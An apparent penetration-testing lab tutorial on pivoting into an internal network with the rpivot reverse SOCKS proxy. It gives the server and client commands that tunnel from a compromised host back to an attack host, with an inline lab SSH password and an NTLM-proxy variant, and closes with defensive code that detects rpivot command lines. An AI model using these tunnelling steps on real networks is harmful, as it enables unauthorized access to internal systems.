Web Server Pivoting with Rpivot

Rpivot is a reverse SOCKS proxy tool written in Python for SOCKS tunneling. Rpivot binds a machine inside a corporate network to an external server and exposes the client's local port on the server-side. We will take the scenario below, where we have a web server on our internal network (172.16.5.135), and we want to access that using the rpivot proxy.

tmux setup

tmux setenv PIVOT_HOST_IP 10.129.147.115
tmux setenv ATTACK_HOST_IP 10.10.15.5

Step 1


Cloning rpivot

git clone https://github.com/klsecservices/rpivot.git

Step 2


Running server.py from the Attack Host

python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip $ATTACK_HOST_IP

Step 3


Transferring rpivot to the Target

scp -r rpivot ubuntu@$PIVOT_HOST_IP:/home/ubuntu/
|<- HTB_@cademy_stdnt!

Connect to Pivot Host

ssh ubuntu@$PIVOT_HOST_IP
|<- HTB_@cademy_stdnt!

Running client.py from Pivot Target

python2.7 client.py --server-ip <ATTACK_HOST_IP> --server-port 9999

Step 4


We will configure proxychains to pivot over our local server on 127.0.0.1:9050 on our attack host, which was initially started by the Python server.

Step 5


Browsing to the Target Webserver using Proxychains

proxychains firefox-esr 172.16.5.135:80

NTLM

Similar to the pivot proxy above, there could be scenarios where we cannot directly pivot to an external server (attack host) on the cloud. Some organizations have an HTTP proxy with NTLM authentication configured with the Domain Controller. In such cases, we can give rpivot an additional NTLM authentication option, supplying a username and password so that it authenticates through the NTLM proxy. We could then use rpivot's client.py in the following way:

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>
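
From the defender's side, both client.py invocations above leave a distinctive command line on the pivot host. The following is an added example, not part of rpivot or the original page: it parses process command lines (as they would appear in auditd execve records or EDR telemetry) and flags likely rpivot clients by the flags shown on this page. The sample command lines, function names and result fields are constructed for illustration.

```python
import shlex

# Flags taken from the client.py invocations shown on this page.
CORE_FLAGS = {"--server-ip", "--server-port"}
NTLM_FLAGS = {"--ntlm-proxy-ip", "--ntlm-proxy-port", "--domain",
              "--username", "--password"}

# Constructed sample telemetry (not captured from a real host).
SAMPLE_CMDLINES = [
    "python2.7 client.py --server-ip 10.10.15.5 --server-port 9999",
    "python /tmp/c.py --server-ip 203.0.113.7 --server-port 8080 --ntlm-proxy-ip 192.0.2.10 --ntlm-proxy-port 8081 --domain CORP --username svc --password 'S3cret!'",
    "python3 manage.py runserver --port 8000",
]

def parse_rpivot_client(cmdline):
    """Return a finding dict if cmdline looks like an rpivot client, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in telemetry: fall back to a naive split
        argv = cmdline.split()
    opts, i = {}, 0
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--"):
            if "=" in tok:  # --flag=value form
                key, val = tok.split("=", 1)
            elif i + 1 < len(argv) and not argv[i + 1].startswith("--"):
                key, val, i = tok, argv[i + 1], i + 1
            else:
                key, val = tok, None
            opts[key] = val
        i += 1
    # Match on the flag pair, not the script name: a file is trivially renamed.
    if not CORE_FLAGS.issubset(opts):
        return None
    return {
        "server": f'{opts["--server-ip"]}:{opts["--server-port"]}',
        "via_ntlm_proxy": "--ntlm-proxy-ip" in opts,
        "ntlm_flags": sorted(NTLM_FLAGS.intersection(opts)),
        "password_on_cmdline": opts.get("--password") is not None,
        "script_renamed": not any(a.endswith("client.py") for a in argv),
    }

def scan(cmdlines):
    """Return (cmdline, finding) pairs for every command line that matches."""
    return [(c, f) for c in cmdlines if (f := parse_rpivot_client(c))]
```

The flag pair is a heuristic and can match unrelated tools, so treat a hit as a lead to correlate with an outbound connection from the same process to the reported server address.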